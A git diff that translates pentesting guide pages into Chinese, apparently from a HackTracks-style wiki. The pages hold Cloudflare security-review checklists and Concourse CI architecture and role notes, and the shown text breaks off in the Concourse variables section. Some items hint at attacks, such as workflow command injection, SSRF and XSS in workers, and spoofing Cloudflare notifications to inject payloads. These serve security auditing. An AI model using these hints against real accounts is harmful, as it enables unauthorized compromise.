--- a/src/pentesting-ci-cd/cloudflare-security/README.md
+++ b/src/pentesting-ci-cd/cloudflare-security/README.md
@@ -2,13 +2,13 @@
{{#include ../../banners/hacktricks-training.md}}
-In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+在 Cloudflare 账户中,有一些 **常规设置和服务** 可以配置。在本页面中,我们将 **分析每个部分与安全相关的设置:**
## Websites
-Review each with:
+逐一检查:
{{#ref}}
cloudflare-domains.md
@@ -16,9 +16,9 @@ cloudflare-domains.md
### Domain Registration
-- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain.
+- [ ] 在 **`Transfer Domains`** 中检查是否无法转移任何域名。
-Review each with:
+逐一检查:
{{#ref}}
cloudflare-domains.md
@@ -26,39 +26,39 @@ cloudflare-domains.md
## Analytics
-_I couldn't find anything to check for a config security review._
+_我找不到任何可以检查配置安全审查的内容。_
## Pages
-On each Cloudflare's page:
+在每个 Cloudflare 页面上:
-- [ ] Check for **sensitive information** in the **`Build log`**.
-- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages.
-- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/).
-- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any).
-- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code**
-- [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**.
-- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page.
+- [ ] 检查 **`Build log`** 中的 **敏感信息**。
+- [ ] 检查分配给页面的 **Github 仓库** 中的 **敏感信息**。
+- [ ] 检查通过 **workflow command injection** 或 `pull_request_target` 可能导致的 GitHub 仓库泄露。更多信息请参见 [**Github Security page**](../github-security/)。
+- [ ] 检查 `/fuctions` 目录中的 **脆弱函数**(如果有),检查 `_redirects` 文件中的 **重定向**(如果有)和 `_headers` 文件中的 **错误配置的头部**(如果有)。
+- [ ] 通过 **blackbox** 或 **whitebox** 检查 **网页** 中的 **漏洞**,如果您可以 **访问代码**。
+- [ ] 在每个页面的详细信息 `//pages/view/blocklist/settings/functions` 中,检查 **`Environment variables`** 中的 **敏感信息**。
+- [ ] 在详细信息页面中,还要检查 **构建命令** 和 **根目录** 以查找 **潜在注入** 以危害页面。
## **Workers**
-On each Cloudflare's worker check:
+在每个 Cloudflare 的 worker 中检查:
-- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker?
-- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information**
-- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input)
- - Check for SSRFs returning the indicated page that you can control
- - Check XSSs executing JS inside a svg image
- - It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input.
+- [ ] 触发器:是什么使 worker 触发?用户是否可以发送将被 worker **使用** 的数据?
+- [ ] 在 **`Settings`** 中,检查包含 **敏感信息** 的 **`Variables`**。
+- [ ] 检查 **worker 的代码** 并搜索 **漏洞**(特别是在用户可以管理输入的地方)。
+- 检查 SSRFs 返回您可以控制的指定页面
+- 检查在 svg 图像内执行 JS 的 XSS
+- worker 可能与其他内部服务交互。例如,worker 可能与 R2 存储桶交互,从输入中获取信息。在这种情况下,需要检查 worker 对 R2 存储桶的权限以及如何可能被用户输入滥用。
> [!WARNING]
-> Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it.
+> 请注意,默认情况下,**Worker 会被赋予一个 URL**,例如 `..workers.dev`。用户可以将其设置为 **子域名**,但如果您知道该 **原始 URL**,则始终可以通过该 URL 访问它。
## R2
-On each R2 bucket check:
+在每个 R2 存储桶中检查:
-- [ ] Configure **CORS Policy**.
+- [ ] 配置 **CORS 策略**。
## Stream
@@ -70,8 +70,8 @@ TODO
## Security Center
-- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise.
-- [ ] Just **check this information** for security misconfigurations and interesting info
+- [ ] 如果可能,运行 **`Security Insights`** **扫描** 和 **`Infrastructure`** **扫描**,因为它们将 **突出** 有趣的信息 **安全** 方面。
+- [ ] 仅检查此信息以查找安全错误配置和有趣的信息
## Turnstile
@@ -86,53 +86,49 @@ cloudflare-zero-trust-network.md
## Bulk Redirects
> [!NOTE]
-> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior.
+> 与 [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/) 不同, [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) 本质上是静态的——它们不支持任何字符串替换操作或正则表达式。但是,您可以配置影响其 URL 匹配行为和运行时行为的 URL 重定向参数。
-- [ ] Check that the **expressions** and **requirements** for redirects **make sense**.
-- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info.
+- [ ] 检查 **重定向的表达式** 和 **要求** 是否 **合理**。
+- [ ] 还要检查是否存在包含有趣信息的 **敏感隐藏端点**。
## Notifications
-- [ ] Check the **notifications.** These notifications are recommended for security:
- - `Usage Based Billing`
- - `HTTP DDoS Attack Alert`
- - `Layer 3/4 DDoS Attack Alert`
- - `Advanced HTTP DDoS Attack Alert`
- - `Advanced Layer 3/4 DDoS Attack Alert`
- - `Flow-based Monitoring: Volumetric Attack`
- - `Route Leak Detection Alert`
- - `Access mTLS Certificate Expiration Alert`
- - `SSL for SaaS Custom Hostnames Alert`
- - `Universal SSL Alert`
- - `Script Monitor New Code Change Detection Alert`
- - `Script Monitor New Domain Alert`
- - `Script Monitor New Malicious Domain Alert`
- - `Script Monitor New Malicious Script Alert`
- - `Script Monitor New Malicious URL Alert`
- - `Script Monitor New Scripts Alert`
- - `Script Monitor New Script Exceeds Max URL Length Alert`
- - `Advanced Security Events Alert`
- - `Security Events Alert`
-- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS**
- - [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous**
+- [ ] 检查 **通知**。这些通知建议用于安全:
+- `Usage Based Billing`
+- `HTTP DDoS Attack Alert`
+- `Layer 3/4 DDoS Attack Alert`
+- `Advanced HTTP DDoS Attack Alert`
+- `Advanced Layer 3/4 DDoS Attack Alert`
+- `Flow-based Monitoring: Volumetric Attack`
+- `Route Leak Detection Alert`
+- `Access mTLS Certificate Expiration Alert`
+- `SSL for SaaS Custom Hostnames Alert`
+- `Universal SSL Alert`
+- `Script Monitor New Code Change Detection Alert`
+- `Script Monitor New Domain Alert`
+- `Script Monitor New Malicious Domain Alert`
+- `Script Monitor New Malicious Script Alert`
+- `Script Monitor New Malicious URL Alert`
+- `Script Monitor New Scripts Alert`
+- `Script Monitor New Script Exceeds Max URL Length Alert`
+- `Advanced Security Events Alert`
+- `Security Events Alert`
+- [ ] 检查所有 **目标**,因为 webhook URL 中可能存在 **敏感信息**(基本 http 身份验证)。还要确保 webhook URL 使用 **HTTPS**。
+- [ ] 作为额外检查,您可以尝试 **冒充 Cloudflare 通知** 给第三方,也许您可以以某种方式 **注入一些危险的东西**。
## Manage Account
-- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**.
-- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**.
-- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle.
- - Therefore, whenever possible is **recommended** to use the **Enterprise plan**.
-- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled.
+- [ ] 可以在 **`Billing` -> `Payment info`** 中查看 **信用卡的最后 4 位数字**、**到期** 时间和 **账单地址**。
+- [ ] 可以在 **`Billing` -> `Subscriptions`** 中查看账户中使用的 **计划类型**。
+- [ ] 在 **`Members`** 中,可以查看账户的所有成员及其 **角色**。请注意,如果计划类型不是企业版,则仅存在 2 个角色:管理员和超级管理员。但如果使用的 **计划是企业版**,则可以使用 [**更多角色**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) 来遵循最小权限原则。
+- 因此,建议在可能的情况下使用 **企业计划**。
+- [ ] 在成员中,可以检查哪些 **成员** 启用了 **2FA**。**每个** 用户都应该启用它。
> [!NOTE]
-> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members)
+> 请注意,幸运的是,角色 **`Administrator`** 不授予管理成员资格的权限(**无法提升权限或邀请** 新成员)。
## DDoS Investigation
-[Check this part](cloudflare-domains.md#cloudflare-ddos-protection).
+[检查此部分](cloudflare-domains.md#cloudflare-ddos-protection)。
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
index 02989e685..fb24eb38f 100644
--- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
+++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md
@@ -2,31 +2,31 @@
{{#include ../../banners/hacktricks-training.md}}
-In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+在 Cloudflare 配置的每个 TLD 中,有一些 **常规设置和服务** 可以配置。在本页面中,我们将 **分析每个部分的安全相关设置:**
-### Overview
+### 概述
-- [ ] Get a feeling of **how much** are the services of the account **used**
-- [ ] Find also the **zone ID** and the **account ID**
+- [ ] 了解账户 **服务的使用程度**
+- [ ] 还要找到 **区域 ID** 和 **账户 ID**
-### Analytics
+### 分析
-- [ ] In **`Security`** check if there is any **Rate limiting**
+- [ ] 在 **`安全`** 中检查是否有 **速率限制**
### DNS
-- [ ] Check **interesting** (sensitive?) data in DNS **records**
-- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com)
-- [ ] Check for web pages that **aren't** **proxied**
-- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address
-- [ ] Check that **DNSSEC** is **enabled**
-- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs**
- - This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings
-- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
+- [ ] 检查 DNS **记录** 中的 **有趣**(敏感?)数据
+- [ ] 检查可能包含 **敏感信息** 的 **子域名**,仅基于 **名称**(如 admin173865324.domin.com)
+- [ ] 检查 **未被代理** 的网页
+- [ ] 检查可以通过 CNAME 或 IP 地址 **直接访问的代理网页**
+- [ ] 检查 **DNSSEC** 是否 **启用**
+- [ ] 检查所有 **CNAME** 是否 **使用 CNAME 扁平化**
+- 这可能有助于 **隐藏子域名接管漏洞** 并改善加载时间
+- [ ] 检查域名 [**是否易受欺骗**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing)
-### **Email**
+### **电子邮件**
TODO
@@ -36,91 +36,91 @@ TODO
### SSL/TLS
-#### **Overview**
+#### **概述**
-- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point.
-- [ ] The **SSL/TLS Recommender** should be enabled
+- [ ] **SSL/TLS 加密** 应该是 **完全** 或 **完全(严格)**。任何其他设置将在某些时候发送 **明文流量**。
+- [ ] **SSL/TLS 推荐器** 应该启用
-#### Edge Certificates
+#### 边缘证书
-- [ ] **Always Use HTTPS** should be **enabled**
-- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled**
-- [ ] **Minimum TLS Version should be 1.2**
-- [ ] **TLS 1.3 should be enabled**
-- [ ] **Automatic HTTPS Rewrites** should be **enabled**
-- [ ] **Certificate Transparency Monitoring** should be **enabled**
+- [ ] **始终使用 HTTPS** 应该 **启用**
+- [ ] **HTTP 严格传输安全 (HSTS)** 应该 **启用**
+- [ ] **最低 TLS 版本应为 1.2**
+- [ ] **TLS 1.3 应该启用**
+- [ ] **自动 HTTPS 重写** 应该 **启用**
+- [ ] **证书透明度监控** 应该 **启用**
-### **Security**
+### **安全**
-- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses.
- - The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used.
-- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used
-- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare
-- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections**
-- [ ] In the **`Settings`** section:
- - [ ] Check that the **`Security Level`** is **medium** or greater
- - [ ] Check that the **`Challenge Passage`** is 1 hour at max
- - [ ] Check that the **`Browser Integrity Check`** is **enabled**
- - [ ] Check that the **`Privacy Pass Support`** is **enabled**
+- [ ] 在 **`WAF`** 部分,检查 **防火墙** 和 **速率限制规则是否被使用** 以防止滥用是很有趣的。
+- **`绕过`** 操作将 **禁用 Cloudflare 安全** 功能。它不应该被使用。
+- [ ] 在 **`页面保护`** 部分,如果使用了任何页面,建议检查其是否 **启用**
+- [ ] 在 **`API 保护`** 部分,如果在 Cloudflare 中暴露了任何 API,建议检查其是否 **启用**
+- [ ] 在 **`DDoS`** 部分,建议启用 **DDoS 保护**
+- [ ] 在 **`设置`** 部分:
+- [ ] 检查 **`安全级别`** 是否为 **中等** 或更高
+- [ ] 检查 **`挑战通行`** 最多为 1 小时
+- [ ] 检查 **`浏览器完整性检查`** 是否 **启用**
+- [ ] 检查 **`隐私通行证支持`** 是否 **启用**
-#### **CloudFlare DDoS Protection**
+#### **CloudFlare DDoS 保护**
-- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access.
-- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie.
- - If the attack is from a **verified bot**, at least **add a rate limit** to bots.
- - If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path.
- - You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF.
- - Check if **Managed rules** could also help to prevent vulnerability exploitations.
- - In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.**
-- In DDoS you could **override some rules to make them more restrictive**.
-- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**.
-- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled
-- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events**
+- 如果可以,启用 **机器人战斗模式** 或 **超级机器人战斗模式**。如果您保护某个通过编程访问的 API(例如来自 JS 前端页面),您可能无法在不破坏该访问的情况下启用此功能。
+- 在 **WAF**:您可以根据 URL 路径创建 **速率限制** 或对 **已验证的机器人**(速率限制规则),或根据 IP、Cookie、引荐来源等 **阻止访问**。因此,您可以阻止不来自网页或没有 Cookie 的请求。
+- 如果攻击来自 **已验证的机器人**,至少 **添加速率限制** 到机器人。
+- 如果攻击针对 **特定路径**,作为预防机制,在该路径中添加 **速率限制**。
+- 您还可以在 WAF 的 **工具** 中 **白名单** IP 地址、IP 范围、国家或 ASN。
+- 检查 **托管规则** 是否也可以帮助防止漏洞利用。
+- 在 **工具** 部分,您可以 **阻止或对特定 IP 和用户代理发出挑战**。
+- 在 DDoS 中,您可以 **覆盖某些规则以使其更具限制性**。
+- **设置**:将 **安全级别** 设置为 **高**,如果您处于攻击中,则设置为 **正在攻击**,并确保 **浏览器完整性检查已启用**。
+- 在 Cloudflare Domains -> Analytics -> Security -> 检查 **速率限制** 是否启用
+- 在 Cloudflare Domains -> Security -> Events -> 检查 **检测到的恶意事件**
-### Access
+### 访问
{{#ref}}
cloudflare-zero-trust-network.md
{{#endref}}
-### Speed
+### 速度
-_I couldn't find any option related to security_
+_我找不到与安全相关的任何选项_
-### Caching
+### 缓存
-- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool**
+- [ ] 在 **`配置`** 部分,考虑启用 **CSAM 扫描工具**
-### **Workers Routes**
+### **Workers 路由**
-_You should have already checked_ [_cloudflare workers_](./#workers)
+_您应该已经检查过_ [_cloudflare workers_](./#workers)
-### Rules
+### 规则
TODO
-### Network
+### 网络
-- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled**
-- [ ] **`HTTP/3 (with QUIC)`** should be **enabled**
-- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled**
+- [ ] 如果 **`HTTP/2`** 已 **启用**,则 **`HTTP/2 到源`** 应该 **启用**
+- [ ] **`HTTP/3 (带 QUIC)`** 应该 **启用**
+- [ ] 如果 **用户** 的 **隐私** 重要,请确保 **`洋葱路由`** 已 **启用**
-### **Traffic**
+### **流量**
TODO
-### Custom Pages
+### 自定义页面
-- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode)
+- [ ] 当触发与安全相关的错误时(如阻止、速率限制或我正在攻击模式),配置自定义页面是可选的
-### Apps
+### 应用
TODO
-### Scrape Shield
+### 抓取保护
-- [ ] Check **Email Address Obfuscation** is **enabled**
-- [ ] Check **Server-side Excludes** is **enabled**
+- [ ] 检查 **电子邮件地址模糊化** 是否 **启用**
+- [ ] 检查 **服务器端排除** 是否 **启用**
### **Zaraz**
@@ -131,7 +131,3 @@ TODO
TODO
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
index 491ae7bc1..017a418de 100644
--- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
+++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
@@ -2,43 +2,43 @@
{{#include ../../banners/hacktricks-training.md}}
-In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+在 **Cloudflare Zero Trust Network** 账户中,有一些 **设置和服务** 可以进行配置。在本页面中,我们将 **分析每个部分的安全相关设置:**
### Analytics
-- [ ] Useful to **get to know the environment**
+- [ ] 有助于 **了解环境**
### **Gateway**
-- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications.
- - If used, **policies** could be created to **restrict** the access to malicious sites.
- - This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies.
+- [ ] 在 **`Policies`** 中,可以生成策略以 **限制** 通过 **DNS**、**网络** 或 **HTTP** 请求谁可以访问应用程序。
+- 如果使用,**策略** 可以被创建以 **限制** 访问恶意网站。
+- 这 **仅在使用网关时相关**,如果不使用,则没有理由创建防御性策略。
### Access
#### Applications
-On each application:
+在每个应用程序上:
-- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access.
- - To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also)
-- [ ] Check the **available identity providers** and make sure they **aren't too open**
-- [ ] In **`Settings`**:
- - [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything)
- - [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP.
- - [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
+- [ ] 检查 **谁** 可以访问该应用程序的 **Policies**,并确保 **只有** 需要访问该应用程序的 **用户** 可以访问。
+- 要允许访问,将使用 **`Access Groups`**(并且 **还可以设置额外规则**)
+- [ ] 检查 **可用的身份提供者**,确保它们 **不太开放**
+- [ ] 在 **`Settings`** 中:
+- [ ] 检查 **CORS 未启用**(如果启用,检查它是否 **安全**,并且不允许所有内容)
+- [ ] Cookies 应具有 **Strict Same-Site** 属性,**HTTP Only** 和 **绑定 cookie** 应在应用程序为 HTTP 时 **启用**。
+- [ ] 考虑启用 **浏览器渲染** 以获得更好的 **保护。更多信息请参见** [**远程浏览器隔离**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**。**
#### **Access Groups**
-- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow.
-- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**.
- - Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary.
+- [ ] 检查生成的访问组是否 **正确限制** 了它们应该允许的用户。
+- [ ] 特别重要的是检查 **默认访问组不太开放**(**不允许太多人**),因为 **默认情况下** 该 **组** 中的任何人都将能够 **访问应用程序**。
+- 请注意,可以给 **每个人** 和其他 **非常开放的策略** 赋予 **访问权限**,除非 100% 必要,否则不推荐使用。
#### Service Auth
-- [ ] Check that all service tokens **expires in 1 year or less**
+- [ ] 检查所有服务令牌 **在 1 年或更短时间内过期**
#### Tunnels
@@ -50,16 +50,12 @@ TODO
### Logs
-- [ ] You could search for **unexpected actions** from users
+- [ ] 您可以搜索用户的 **意外操作**
### Settings
-- [ ] Check the **plan type**
-- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address**
-- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service
+- [ ] 检查 **计划类型**
+- [ ] 可以查看 **信用卡持有者姓名**、**最后 4 位数字**、**到期** 日期和 **地址**
+- [ ] 建议 **添加用户座位到期** 以移除不真正使用此服务的用户
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/README.md b/src/pentesting-ci-cd/concourse-security/README.md
index bcf20facf..72cf53091 100644
--- a/src/pentesting-ci-cd/concourse-security/README.md
+++ b/src/pentesting-ci-cd/concourse-security/README.md
@@ -2,36 +2,32 @@
{{#include ../../banners/hacktricks-training.md}}
-## Basic Information
+## 基本信息
-Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...)
+Concourse 允许您 **构建管道** 以在需要时自动运行测试、操作和构建镜像(基于时间,或在发生某些事情时...)
-## Concourse Architecture
+## Concourse 架构
-Learn how the concourse environment is structured in:
+了解 concourse 环境的结构:
{{#ref}}
concourse-architecture.md
{{#endref}}
-## Concourse Lab
+## Concourse 实验室
-Learn how you can run a concourse environment locally to do your own tests in:
+了解如何在本地运行 concourse 环境以进行自己的测试:
{{#ref}}
concourse-lab-creation.md
{{#endref}}
-## Enumerate & Attack Concourse
+## 枚举与攻击 Concourse
-Learn how you can enumerate the concourse environment and abuse it in:
+了解如何枚举 concourse 环境并利用它:
{{#ref}}
concourse-enumeration-and-attacks.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
index d70167906..a454847ef 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
@@ -4,7 +4,7 @@
{{#include ../../banners/hacktricks-training.md}}
-[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html)
+[**来自Concourse文档的相关数据:**](https://concourse-ci.org/internals.html)
### Architecture
@@ -12,31 +12,27 @@
#### ATC: web UI & build scheduler
-The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
+ATC是Concourse的核心。它运行**web UI和API**,并负责所有管道**调度**。它**连接到PostgreSQL**,用于存储管道数据(包括构建日志)。
-The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
+[checker](https://concourse-ci.org/checker.html)的职责是持续检查资源的新版本。[scheduler](https://concourse-ci.org/scheduler.html)负责为作业调度构建,而[build tracker](https://concourse-ci.org/build-tracker.html)负责运行任何已调度的构建。[garbage collector](https://concourse-ci.org/garbage-collector.html)是用于清理任何未使用或过时对象(如容器和卷)的机制。
#### TSA: worker registration & forwarding
-The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
+TSA是一个**定制的SSH服务器**,仅用于安全地**注册**[**workers**](https://concourse-ci.org/internals.html#architecture-worker)与[ATC](https://concourse-ci.org/internals.html#component-atc)。
-The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer.
+TSA默认监听端口`2222`,通常与[ATC](https://concourse-ci.org/internals.html#component-atc)共同放置,并位于负载均衡器后面。
-The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
+**TSA通过SSH连接实现CLI,**支持[**这些命令**](https://concourse-ci.org/internals.html#component-tsa)。
#### Workers
-In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
+为了执行任务,Concourse必须有一些workers。这些workers通过[TSA](https://concourse-ci.org/internals.html#component-tsa)进行**自我注册**,并运行服务[**Garden**](https://github.com/cloudfoundry-incubator/garden)和[**Baggageclaim**](https://github.com/concourse/baggageclaim)。
-- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**.
-- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**.
+- **Garden**:这是**容器管理API**,通常通过**HTTP**在**端口7777**上运行。
+- **Baggageclaim**:这是**卷管理API**,通常通过**HTTP**在**端口7788**上运行。
## References
- [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
index 4b778a804..c4b5faf48 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
@@ -4,49 +4,47 @@
{{#include ../../banners/hacktricks-training.md}}
-### User Roles & Permissions
+### 用户角色与权限
-Concourse comes with five roles:
+Concourse 具有五个角色:
-- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
-- **owner**: Team owners can **modify everything within the team**.
-- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
-- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
-- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
+- _Concourse_ **管理员**:此角色仅授予 **主团队**(默认初始 concourse 团队)的所有者。管理员可以 **配置其他团队**(例如:`fly set-team`,`fly destroy-team`...)。此角色的权限无法通过 RBAC 进行影响。
+- **所有者**:团队所有者可以 **修改团队内的所有内容**。
+- **成员**:团队成员可以在 **团队资产** 中 **读取和写入**,但无法修改团队设置。
+- **管道操作员**:管道操作员可以执行 **管道操作**,例如触发构建和固定资源,但无法更新管道配置。
+- **查看者**:团队查看者对团队及其管道具有 **“只读”** 访问权限。
> [!NOTE]
-> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
+> 此外,**所有者、成员、管道操作员和查看者的角色权限可以通过配置 RBAC 进行修改**(更具体地说是其操作)。有关更多信息,请阅读:[https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
-Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
+请注意,Concourse **将管道分组到团队中**。因此,属于某个团队的用户将能够管理这些管道,并且 **可能存在多个团队**。用户可以属于多个团队,并在每个团队中拥有不同的权限。
-### Vars & Credential Manager
+### 变量与凭证管理器
-In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\
-[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
-The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
